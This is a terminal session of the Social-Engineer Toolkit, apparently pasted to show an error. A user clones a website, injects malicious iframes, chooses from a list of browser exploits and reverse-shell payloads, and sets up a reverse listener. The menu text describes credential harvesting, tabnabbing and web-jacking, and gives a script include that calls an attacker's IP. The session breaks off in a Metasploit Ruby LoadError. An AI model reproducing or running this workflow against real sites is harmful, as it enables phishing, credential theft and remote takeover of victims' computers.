- ..######..########.########
- .##....##.##..........##...
- .##.......##..........##...
- ..######..######......##...
- .......##.##..........##...
- .##....##.##..........##...
- ..######..########....##...
- [---] The Social-Engineer Toolkit (SET) [---]
- [---] Created by: David Kennedy (ReL1K) [---]
- [---] Version: 4.7.2 [---]
- [---] Codename: 'Headshot' [---]
- [---] Follow us on Twitter: @trustedsec [---]
- [---] Follow me on Twitter: @dave_rel1k [---]
- [---] Homepage: https://www.trustedsec.com [---]
- Welcome to the Social-Engineer Toolkit (SET). The one
- stop shop for all of your social-engineering needs.
- Join us on irc.freenode.net in channel #setoolkit
- The Social-Engineer Toolkit is a product of TrustedSec.
- Visit: https://www.trustedsec.com
- Select from the menu:
- 1) Social-Engineering Attacks
- 2) Fast-Track Penetration Testing
- 3) Third Party Modules
- 4) Update the Metasploit Framework
- 5) Update the Social-Engineer Toolkit
- 6) Update SET configuration
- 7) Help, Credits, and About
- 99) Exit the Social-Engineer Toolkit
- set> 1
- Select from the menu:
- 1) Spear-Phishing Attack Vectors
- 2) Website Attack Vectors
- 3) Infectious Media Generator
- 4) Create a Payload and Listener
- 5) Mass Mailer Attack
- 6) Arduino-Based Attack Vector
- 7) SMS Spoofing Attack Vector
- 8) Wireless Access Point Attack Vector
- 9) QRCode Generator Attack Vector
- 10) Powershell Attack Vectors
- 11) Third Party Modules
- 99) Return back to the main menu.
- set> 2
- The Web Attack module is a unique way of utilizing multiple web-based attacks
- in order to compromise the intended victim.
- The Java Applet Attack method will spoof a Java Certificate and deliver a
- metasploit based payload. Uses a customized java applet created by Thomas
- Werth to deliver the payload.
- The Metasploit Browser Exploit method will utilize select Metasploit
- browser exploits through an iframe and deliver a Metasploit payload.
- The Credential Harvester method will utilize web cloning of a web-
- site that has a username and password field and harvest all the
- information posted to the website.
- The TabNabbing method will wait for a user to move to a different
- tab, then refresh the page to something different.
- The Man Left in the Middle Attack method was introduced by Kos and
- utilizes HTTP REFERER's in order to intercept fields and harvest
- data from them. You need to have an already vulnerable site and in-
- corporate <script src="http://YOURIP/">. This could either be from a
- compromised site or through XSS.
- The Web-Jacking Attack method was introduced by white_sheep, Emgent
- and the Back|Track team. This method utilizes iframe replacements to
- make the highlighted URL link to appear legitimate however when clicked
- a window pops up then is replaced with the malicious link. You can edit
- the link replacement settings in the set_config if its too slow/fast.
- The Multi-Attack method will add a combination of attacks through the web attack
- menu. For example you can utilize the Java Applet, Metasploit Browser,
- Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
- all at once to see which is successful.
- 1) Java Applet Attack Method
- 2) Metasploit Browser Exploit Method
- 3) Credential Harvester Attack Method
- 4) Tabnabbing Attack Method
- 5) Man Left in the Middle Attack Method
- 6) Web Jacking Attack Method
- 7) Multi-Attack Web Method
- 8) Create or import a CodeSigning Certificate
- 99) Return to Main Menu
- set:webattack>2
- The first method will allow SET to import a list of pre-defined web
- applications that it can utilize within the attack.
- The second method will completely clone a website of your choosing
- and allow you to utilize the attack vectors within the completely
- same web application you were attempting to clone.
- The third method allows you to import your own website, note that you
- should only have an index.html when using the import website
- functionality.
- 1) Web Templates
- 2) Site Cloner
- 3) Custom Import
- 99) Return to Webattack Menu
- set:webattack>2
- [-] NAT/Port Forwarding can be used in the cases where your SET machine is
- [-] not externally exposed and may be a different IP address than your reverse listener.
- set> Are you using NAT/Port Forwarding [yes|no]: no
- [-] Enter the IP address of your interface IP or if your using an external IP, what
- [-] will be used for the connection back and to house the web server (your interface address)
- set:webattack> IP address or hostname for the reverse connection:192.168.1.55
- [-] SET supports both HTTP and HTTPS
- [-] Example: http://www.thisisafakesite.com
- set:webattack> Enter the url to clone:http://www.tblop.com
- Enter the browser exploit you would like to use [8]:
- 1) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)Java Applet JMX Remote Code Execution (2013-01-10)
- 2) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
- 3) Java 7 Applet Remote Code Execution (2012-08-26)
- 4) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
- 5) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
- 6) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
- 7) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
- 8) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
- 9) Adobe Flash Player Object Type Confusion (2012-05-04)
- 10) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
- 11) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
- 12) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
- 13) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
- 14) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
- 15) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
- 16) Internet Explorer CSS Import Use After Free (2010-11-29)
- 17) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
- 18) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
- 19) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
- 20) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
- 21) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
- 22) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
- 23) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
- 24) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
- 25) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
- 26) Microsoft Help Center XSS and Command Execution (2010-06-09)
- 27) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
- 28) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
- 29) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
- 30) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
- 31) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
- 32) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
- 33) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
- 34) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
- 35) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
- 36) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
- 37) Metasploit Browser Autopwn (USE AT OWN RISK!)
- set:payloads>1
- 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
- 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
- 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
- 4) Windows Bind Shell Execute payload and create an accepting port on remote system.
- 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
- 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
- 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
- 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
- 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
- 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter
- 11) Download/Run your Own Executable Downloads an executable and runs it
- set:payloads>11
- [*] Selecting Java Meterpreter as payload since it is exploit specific.
- set:payloads> Port to use for the reverse [443]:4242
- [*] Cloning the website: http://www.tblop.com
- [*] This could take a little bit...
- [*] Injecting iframes into cloned website for MSF Attack....
- [*] Malicious iframe injection successful...crafting payload.
- [*] Apache appears to be running, moving files into Apache's home
- ***************************************************
- Web Server Launched. Welcome to the SET Web Attack.
- ***************************************************
- [--] Tested on Windows, Linux, and OSX [--]
- [--] Apache web server is currently in use for performance. [--]
- [*] Moving payload into cloned website.
- [*] The site has been moved. SET Web Server is now listening..
- [-] Launching MSF Listener...
- [-] This may take a few to load MSF...
- /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require': no such file to load -- rubygems (LoadError)
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from <internal:gem_prelude>:158:in `load_full_rubygems_library'
- from <internal:gem_prelude>:270:in `const_missing'
- from /opt/metasploit/apps/pro/msf3/lib/msf/sanity.rb:40:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/msf/core.rb:14:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console/driver.rb:2:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console.rb:11:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/msf/ui.rb:11:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3//msfconsole:136:in `<main>'